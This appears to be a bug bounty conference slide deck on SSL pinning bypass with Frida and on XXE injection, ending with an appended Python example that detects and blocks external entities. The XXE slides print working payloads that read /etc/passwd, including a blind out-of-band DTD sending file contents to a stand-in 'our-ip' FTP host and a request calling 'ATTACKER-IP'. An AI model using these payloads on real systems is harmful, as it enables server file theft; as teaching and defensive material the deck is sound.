From SSL Pinning Bypass to XXE Injection

Uploaded by Uday Shelke

$ curl https://who.are.we/api/v3/users | json_pp

{
  "spenkk": {
    "Name": "Arben Shala",
    "Work": {
      "Novus": "Cybersecurity Engineer",
      "Hackerone": "Part-Time Bug Bounty Hunter"
    }
  },
  "0xcela": {
    "Name": "Çlirim Emini",
    "Work": {
      "Cobalt Core": "Penetration Tester",
      "Synack Red Team": "Bug Bounty Hunter",
      "Hackerone": "Bug Bounty Hunter"
    }
  }
}

Intro to Bug Bounty
- Benefits
- Pentest vs Bug Bounty
- Where should I start?


Intro to Bug Bounty
- Firewalls
- *.scope


Intro to Bug Bounty
- Why should we look into mobile apps (Android/iOS)?


SSL Pinning Bypass

What is SSL Pinning?

Requirements for bypass:
- Web proxy (e.g., Burp Suite)
- Rooted Android device
- Frida-Tools


SSL Pinning Bypass

- How to configure the network and certificates between Burp Suite and Genymotion?

https://spenkk.github.io/


SSL Pinning Bypass

- What is Frida?
- Why is it mainly used for Android testing?


XXE Injection

What is XXE Injection?

Request:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY>
<!ENTITY ssrf SYSTEM "file:///etc/passwd">
]>
<root>
<question>What is XXE Injection?</question>
<types>
Types of xxe injection:
<normal>Classic XXE</normal>
<blind>Blind OOB</blind>
<techniques>&ssrf;</techniques>
<techniques>&ftp;</techniques>
<techniques>&gopher;</techniques>
<techniques>&http;</techniques>
</types>
</root>

Response:
200 OK
root:x:0:0::/root:/bin/bash
bin:x:1:1::/:/usr/bin/nologin
daemon:x:2:2::/:/usr/bin/nologin
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
ftp:x:14:11::/srv/ftp:/usr/bin/nologin
http:x:33:33::/srv/http:/usr/bin/nologin
nobody:x:65534:65534:Nobody:/:/usr/bin/nologin
dbus:x:81:81:System Message Bus:/:/usr/bin/nologin
systemd-journal-remote:x:982:982:systemd Journal Remote:/:/usr/bin/nologin
systemd-network:x:981:981:systemd Network Management:/:/usr/bin/nologin
XXE Injection
- Response received in the Burp Collaborator server.


XXE Injection

Technique: Blind OOB Injection
- Payload.dtd is hosted on our server
- We send a malicious request that asks our server for payload.dtd
- Payload.dtd asks for /etc/passwd

Payload.dtd:
<!ENTITY % trick SYSTEM "file:///etc/passwd">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'ftp://our-ip/%trick;'>">
%int;

Protocols that we used for data exfiltration:
Http -> fail
Gopher -> fail
Ftp -> success

Request:
POST /redacted/redacted.php?function=GetDefaultCountry HTTP/1.1
Host: secure.REDACTED.com

XMLDOC=%3C%3Fxml%20version%3D%221.0%22%3F%3E%3C%21DOCTYPE%20convert%20%5B%20%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2FATTACKER-IP%22%3E%25remote%3B%25int%3B%25trick%3B%5D%3E

URL decoded:
XMLDOC=<?xml version="1.0"?><!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://ATTACKER-IP/">%remote;%int;%trick;]>
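The defender's counterpart to the blind OOB request above, as an added example that is not part of the slides: it URL-decodes the XMLDOC field the way the request carries it, lists the external entities a document declares (here the parameter entity remote pointing at the attacker host) without resolving any of them, and shows a parser that refuses any DOCTYPE so such a payload never reaches entity processing. The request body is constructed from the slide with its ATTACKER-IP placeholder kept; Python's standard-library expat is assumed.

```python
from urllib.parse import parse_qs
from xml.parsers import expat

class UnsafeXML(Exception):
    """Raised by the hardened parser when a document carries a DOCTYPE."""

def xmldoc_from_body(body):
    """URL-decode the XMLDOC form field out of a raw POST body, as in the slide."""
    return parse_qs(body, keep_blank_values=True).get("XMLDOC", [""])[0]

def inspect_entities(doc):
    """Detection: return (doctype_name, [(entity, is_parameter_entity, system_id)])
    for every external entity declared in the internal subset. expat does not
    resolve external references unless asked, so nothing is fetched; a parse
    error after the DTD (e.g. no root element) is ignored, the declarations
    having already been recorded."""
    found = {"doctype": None, "external": []}
    def on_doctype(name, sysid, pubid, has_internal_subset):
        found["doctype"] = name
    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if sysid is not None:  # SYSTEM entity: points outside the document
            found["external"].append((name, bool(is_param), sysid))
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(doc, True)
    except expat.ExpatError:
        pass
    return found["doctype"], found["external"]

def parse_without_dtd(doc):
    """Mitigation: reject any DOCTYPE, so no entity can be declared at all;
    otherwise return the element names in document order."""
    names = []
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE {name!r} rejected: DTDs are not accepted")
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(doc, True)
    return names

# Constructed sample: the slide's request body, URL-encoded as it would be sent.
SAMPLE_BODY = (
    "XMLDOC=%3C%3Fxml%20version%3D%221.0%22%3F%3E%3C%21DOCTYPE%20convert%20%5B%20"
    "%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2FATTACKER-IP%2F%22%3E"
    "%25remote%3B%25int%3B%25trick%3B%5D%3E"
)
```

Logging the (doctype, external entities) pair from inspect_entities on every rejected request gives a useful detection signal, while parse_without_dtd is the setting an application that never needs a DTD should run with.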
Thank you for your attention
Questions?